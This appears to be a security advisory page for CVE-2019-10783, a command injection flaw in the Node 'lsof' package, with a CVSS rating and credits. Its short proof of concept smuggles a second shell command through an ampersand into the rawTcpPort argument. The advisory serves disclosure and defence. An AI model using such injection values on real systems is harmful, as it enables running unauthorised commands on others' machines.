Command Injection

Affecting lsof package, ALL versions

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

lsof is a lsof processor for node.

Affected versions of this package are vulnerable to Command Injection. Multiple areas of the package is vulnerable to command injection. Every exported method used by the packages uses the exec function to parse user input.

PoC by JHU System Security Lab

var root = require("lsof");
var attack_code = "& echo vulnerable > create.txt &";
root.rawTcpPort(attack_code, function(){});

Remediation

There is no fixed version for lsof.

References

CVSS Score

7.5
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    None
  • Availability
    None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C
Credit
JHU System Security Lab
CVE
CVE-2019-10783
CWE
CWE-78
Snyk ID
SNYK-JS-LSOF-543632
Disclosed
29 Jan, 2020
Published
29 Jan, 2020